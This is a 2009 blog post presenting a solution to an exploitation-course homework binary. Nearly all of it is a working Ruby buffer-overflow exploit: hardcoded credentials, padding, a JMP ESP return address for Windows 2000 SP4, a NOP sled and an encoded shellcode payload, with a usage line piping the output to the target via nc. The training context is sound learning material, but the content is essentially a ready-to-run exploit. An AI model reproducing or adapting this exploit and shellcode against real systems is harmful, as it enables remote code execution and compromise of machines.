23
Jan
2009

Solution to homework.exe

This is the solution to the http://pentest.cryptocity.net/exploitation/ homework.exe that was posted. The videos are great, a must watch for anyone that wants try exploit development. Just a simple ruby script, only works vs windows 2000sp4r1 only VM I had access to. 
exploit.rb
#!/usr/bin/env ruby

#usage ./exploit.rb | nc ip homework.exe 1974

require 'socket'

#2000 SP4 Rollup 1
JMP_ESP = [0x77F81BE3].pack('V')
NOP = "\x90"
USERNAME = "poly"
PASSWORD = "teknik"
PAYLOAD = 
  "\x33\xc9\xb1\x56\xbb\x79\xaa\x11\x96\xd9\xf6\xd9\x74\x24" +
  "\xf4\x5f\x31\x5f\x10\x03\x5f\x10\x83\xc7\x04\x9b\x5f\xed" +
  "\x7e\xd2\xa0\x0e\x7f\x84\x29\xeb\x4e\x96\x4e\x7f\xe2\x26" +
  "\x04\x2d\x0f\xcd\x48\xc6\x84\xa3\x44\xe9\x2d\x09\xb3\xc4" +
  "\xae\xbc\x7b\x8a\x6d\xdf\x07\xd1\xa1\x3f\x39\x1a\xb4\x3e" +
  "\x7e\x47\x37\x12\xd7\x03\xea\x82\x5c\x51\x37\xa3\xb2\xdd" +
  "\x07\xdb\xb7\x22\xf3\x51\xb9\x72\xac\xee\xf1\x6a\xc6\xa8" +
  "\x21\x8a\x0b\xab\x1e\xc5\x20\x1f\xd4\xd4\xe0\x6e\x15\xe7" +
  "\xcc\x3c\x28\xc7\xc0\x3d\x6c\xe0\x3a\x48\x86\x12\xc6\x4a" +
  "\x5d\x68\x1c\xdf\x40\xca\xd7\x47\xa1\xea\x34\x11\x22\xe0" +
  "\xf1\x56\x6c\xe5\x04\xbb\x06\x11\x8c\x3a\xc9\x93\xd6\x18" +
  "\xcd\xf8\x8d\x01\x54\xa5\x60\x3e\x86\x01\xdc\x9a\xcc\xa0" +
  "\x09\x9c\x8e\xac\xfe\x92\x30\x2d\x69\xa5\x43\x1f\x36\x1d" +
  "\xcc\x13\xbf\xbb\x0b\x53\xea\x7b\x83\xaa\x15\x7b\x8d\x68" +
  "\x41\x2b\xa5\x59\xea\xa0\x35\x65\x3f\x66\x66\xc9\x90\xc6" +
  "\xd6\xa9\x40\xae\x3c\x26\xbe\xce\x3e\xec\xc9\xc9\xf0\xd4" +
  "\x99\xbd\xf0\xea\x0c\x61\x7c\x0c\x44\x89\x28\x86\xf1\x6b" +
  "\x0f\x1f\x65\x94\x65\x33\x3e\x02\x31\x5d\xf8\x2d\xc2\x4b" +
  "\xaa\x82\x6a\x1c\x39\xc8\xae\x3d\x3e\xc5\x86\x34\x06\x8d" +
  "\x5d\x29\xc4\x2c\x61\x60\xbe\xcd\xf0\xef\x3f\x98\xe8\xa7" +
  "\x68\xcd\xdf\xb1\xfd\xe3\x46\x68\xe0\xfe\x1f\x53\xa0\x24" +
  "\xdc\x5a\x28\xa9\x58\x79\x3a\x77\x60\xc5\x6e\x27\x37\x93" +
  "\xd8\x81\xe1\x55\xb3\x5b\x5d\x3c\x53\x1a\xad\xff\x25\x23" +
  "\xf8\x89\xca\x95\x55\xcc\xf5\x19\x32\xd8\x8e\x44\xa2\x27" +
  "\x45\xcd\xc2\xc5\x4c\x3b\x6b\x50\x05\x86\xf6\x63\xf3\xc4" +
  "\x0e\xe0\xf6\xb4\xf4\xf8\x72\xb1\xb1\xbe\x6f\xcb\xaa\x2a" +
  "\x90\x78\xca\x7e\x9a"

boom = USERNAME + ":" + PASSWORD + "A" * 117 + JMP_ESP + NOP * 500 + PAYLOAD + "\r\n"

puts boom + "\r\n"

 

Posted by hammackj

no comments


Trackbacks

Use the following link to trackback from your own site:
http://www.hammackj.com/trackbacks?article_id=4

 

Comments

Leave a response

Leave a comment